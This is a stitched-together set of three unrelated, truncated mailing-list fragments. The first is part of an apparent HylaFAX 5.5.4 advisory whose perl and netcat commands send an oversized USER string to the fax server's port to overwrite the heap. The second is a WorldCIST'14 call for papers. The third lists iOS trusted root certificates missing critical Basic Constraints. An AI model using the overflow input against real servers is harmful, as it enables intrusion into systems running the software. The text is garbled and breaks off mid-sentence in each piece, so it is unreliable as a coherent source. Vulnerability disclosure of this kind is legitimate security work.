authentication without buffer overflow: # perl -le 'print USER .(xx10).12345\nPASS test-ldap\nQUIT\n\n ' | nc -q 5:5 192.168.2.33 4559 (seen on client) nc: using stream socket 220 localhost server (HylaFAX (tm) Version 5.5.4) ready. 331 Password required for xx12345. 530 Bind LDAP error -1: Can't contact LDAP server 530 Login incorrect. 4) Test again, but increase the amount of data in the “USER” command to overwrite the heap: # perl -le 'print USER .(xx500).12345\nPASS test-ldap\nQUIT\n\n ' | nc -q 5:5 192.168.2.33 4559 (client) 220 localhost server (HylaFAX (tm) Version 5.5.4) ready. 331 Password required for
CFP: WorldCIST'14 - World Conference on IST, at Madeira Island
Apologies if you are receiving this mail more than once... ** WorldCIST'14 The 2014 World Conference on Information Systems and Technologies April 15 - 18, Madeira Island, Portugal http://www.aisti.eu/worldcist14/ ** The 2014 World Conference on Information Systems and Technologies (WorldCIST'14: http://www.aisti.eu/worldcist14) is a global forum for researchers and practitioners to present and discuss the most recent innovations, trends, results, experiences and concerns in the several perspectives of Information Systems and Technologies. We are pleased to invite you to submit your papers to WorldCISTI'14. All submissions will be reviewed on the basis of relevance, originality, importance and clarity. THEMES Submitted papers should be related with one or more of the main themes proposed for the Conference: A) Information and Knowledge Management (IKM); B) Organizational Models and Information Systems (OMIS); C) Intelligent and Decision Support Systems (IDSS); D) Software Systems, Architectures, Applications and Tools (SSAAT); E) Computer Networks, Mobility and Pervasive Systems (CNMPS); F) Human-Computer Interaction (HCI); G) Health Informatics (HIS); H) Information Technologies in Education (ITE). TYPES OF SUBMISSIONS AND DECISIONS Four types of papers can be submitted: Full paper: Finished or consolidated RD works, to be included in one of the Conference themes. These papers are assigned a 10-page limit. Short paper: Ongoing works with relevant preliminary results, open to discussion. These papers are assigned a 7-page limit. Poster paper: Initial work with relevant ideas, open to discussion. These papers are assigned to a 4-page limit. Company paper: Companies' papers that show practical experience, R D, tools, etc., focused on some topics of the conference. These papers are assigned to a 4-page limit. Submitted papers must comply with the format of Advances in Intelligent Systems and Computing Series (see Instructions for Authors at Springer Website or download a DOC example) be written in English, must not have been published before, not be under review for any other conference or publication and not include any information leading to the authors identification. Therefore, the authors names, affiliations and bibliographic references should not be included in the version for evaluation by the Program Committee. This information should only be included in the camera-ready version, saved in Word or Latex format and also in PDF format. These files must be accompanied by the Consent to Publication form filled out, in a ZIP file, and uploaded at the conference management system. All papers will be subjected to a double-blind review by at least two members of the Program Committee. Based on Program Committee evaluation, a paper can be rejected or accepted by the Conference Chairs. In the later case, it can be accepted as the type originally submitted or as another type. Thus, full papers can be accepted as short papers or poster papers only. Similarly, short papers can be accepted as poster papers only. In these cases, the authors will be allowed to maintain the original number of pages in the camera-ready version. The authors of accepted poster papers must also build and print a poster to be exhibited during the Conference. This poster must follow an A1 or A2 vertical format. The Conference includes Work Sessions where these posters are presented and orally discussed, with a 5 minute limit per poster. The authors of accepted full papers will have 15 minutes to present their work in a Conference Work Session; approximately 5 minutes of discussion will follow each presentation. The authors of accepted short papers and company papers will have 11 minutes to present their work in a Conference Work Session; approximately 4 minutes of discussion will follow each presentation. PUBLICATION AND INDEXING To ensure that a full paper, short paper, poster paper or company paper is published in the Proceedings, at least one of the authors must be fully registered by the 24th of January 2014, and the paper must comply with the suggested layout and page-limit. Additionally, all recommended changes must be addressed by the authors before they submit the camera-ready version. No more than one paper per registration will be published in the Conference Proceedings. An extra fee must be paid for publication of additional papers, with a maximum of one additional paper per registration. Full and short papers will be published in Proceedings by Springer, in Advances in Intelligent Systems and Computing Series. Poster and company papers will be published in Proceedings by AISTI. Published full and short papers will be submitted
iOS: List of available trusted root certificates
From iOS: List of available trusted root certificates, http://support.apple.com/kb/HT5012. There's no reason to allow some of this to occur in 2013. As a proxy-relying-party, Apple is responsible for this stuff because users are not allowed to make the decisions or modify the Trust Store. For reference: Peter Gutmann, Engineering Security, www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf Baseline Certificate Requirements: https://www.cabforum.org/Baseline_Requirements_V1_1_6.pdf Extended Validation Certificate Requirements: https://www.cabforum.org/Guidelines_v1_4_3.pdf Subject: C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 1999 VeriSign, Inc. - For authorized use only, CN=VeriSign Class 4 Public Primary Certification Authority - G3 Serial Number: ec:a0:a7:8b:6e:75:6a:01:cf:c4:7c:cc:2f:94:5e:d7 Missing Critical Basic Constraint and CA=TRUE Subject: C=DK, O=TDC Internet, OU=TDC Internet Root CA Serial Number: 986490188 (0x3acca54c) Missing Critical Basic Constraint Subject: CN=T\xC3\x9CRKTRUST Elektronik Sertifika Hizmet Sa\xC4\x9Flay\xC4\xB1c\xC4\xB1s\xC4\xB1, C=TR, L=ANKARA, O=(c) 2005 T\xC3\x9CRKTRUST Bilgi \xC4\xB0leti\xC5\x9Fim ve Bili\xC5\x9Fim G\xC3\xBCvenli\xC4\x9Fi Hizmetleri A.\xC5\x9E. Serial Number: 1 (0x1) Missing Critical Basic Constraint Subject: C=US, O=Entrust.net, OU=www.entrust.net/CPS incorp. by ref. (limits liab.), OU=(c) 1999 Entrust.net Limited, CN=Entrust.net Secure Server Certification Authority Serial Number: 927650371 (0x374ad243) Missing Critical Basic Constraint Subject: C=CN, O=UniTrust, CN=UCA Root Serial Number: 9 (0x9) Missing Critical Basic Constraint Subject: C=US, O=VeriSign, Inc., OU=Class 3 Public Primary Certification Authority Serial Number: 70:ba:e4:1d:10:d9:29:34:b6:38:ca:7b:03:cc:ba:bf Missing Critical Basic Constraint and CA=TRUE Subject: C=US, O=VeriSign, Inc., OU=Class 3 Public Primary Certification Authority Serial Number: 3c:91:31:cb:1f:f6:d0:1b:0e:9a:b8:d0:44:bf:12:be Missing Critical Basic Constraint and CA=TRUE Subject: L=ValiCert Validation Network, O=ValiCert, Inc., OU=ValiCert Class 2 Policy Validation Authority, CN=http://www.valicert.com//emailAddress=i...@valicert.com Serial Number: 1 (0x1) Missing Critical Basic Constraint and CA=TRUE Subject: C=US, O=VeriSign, Inc., OU=Class 3 Public Primary Certification Authority - G2, OU=(c) 1998 VeriSign, Inc. - For authorized use only, OU=VeriSign Trust Network Serial Number: 7d:d9:fe:07:cf:a8:1e:b7:10:79:67:fb:a7:89:34:c6 Missing Critical Basic Constraint and CA=TRUE Subject: C=US, O=VeriSign, Inc., OU=Class 4 Public Primary Certification Authority - G2, OU=(c) 1998 VeriSign, Inc. - For authorized use only, OU=VeriSign Trust Network Serial Number: 32:88:8e:9a:d2:f5:eb:13:47:f8:7f:c4:20:37:25:f8 Missing Critical Basic Constraint and CA=TRUE Subject: C=IL, O=StartCom Ltd., OU=Secure Digital Certificate Signing, CN=StartCom Certification Authority Serial Number: 1 (0x1) Missing Critical Basic Constraint Subject: L=ValiCert Validation Network, O=ValiCert, Inc., OU=ValiCert Class 1 Policy Validation Authority, CN=http://www.valicert.com//emailAddress=i...@valicert.com Serial Number: 1 (0x1) Missing Critical Basic Constraint and CA=TRUE Subject: C=US, O=VeriSign, Inc., OU=Class 1 Public Primary Certification Authority Serial Number: cd:ba:7f:56:f0:df:e4:bc:54:fe:22:ac:b3:72:aa:55 Missing Critical Basic Constraint and CA=TRUE Subject: C=US, O=VeriSign, Inc., OU=Class 1 Public Primary Certification Authority Serial Number: 3f:69:1e:81:9c:f0:9a:4a:f3:73:ff:b9:48:a2:e4:dd Missing Critical Basic Constraint and CA=TRUE Subject: C=CN, O=UniTrust, CN=UCA Global Root Serial Number: 8 (0x8) Missing Critical Basic Constraint Subject: C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 1999 VeriSign, Inc. - For authorized use only, CN=VeriSign Class 2 Public Primary Certification Authority - G3 Serial Number: 61:70:cb:49:8c:5f:98:45:29:e7:b0:a6:d9:50:5b:7a Missing Critical Basic Constraint and CA=TRUE Subject: C=US, O=U.S. Government, OU=DoD, OU=PKI, CN=DoD CLASS 3 Root CA Serial Number: 4 (0x4) Missing Critical Basic Constraint Subject: C=KR, O=KISA, OU=Korea Certification Authority Central, CN=KISA RootCA 3 Serial Number: 2 (0x2) Missing Critical Basic Constraint and CA=TRUE Subject: C=US, O=VeriSign, Inc., OU=Class 2 Public Primary Certification Authority - G2, OU=(c) 1998 VeriSign, Inc. - For authorized use only, OU=VeriSign Trust Network Serial Number: b9:2f:60:cc:88:9f:a1:7a:46:09:b8:5b:70:6c:8a:af Missing Critical Basic Constraint and CA=TRUE Subject: C=TW, O=Chunghwa Telecom Co., Ltd., OU=ePKI Root Certification Authority Serial Number: 15:c8:bd:65:47:5c:af:b8:97:00:5e:e4:06:d2:bc:9d Missing Critical Basic Constraint Subject: C=US, O=GTE Corporation, OU=GTE CyberTrust Solutions, Inc., CN=GTE CyberTrust Global
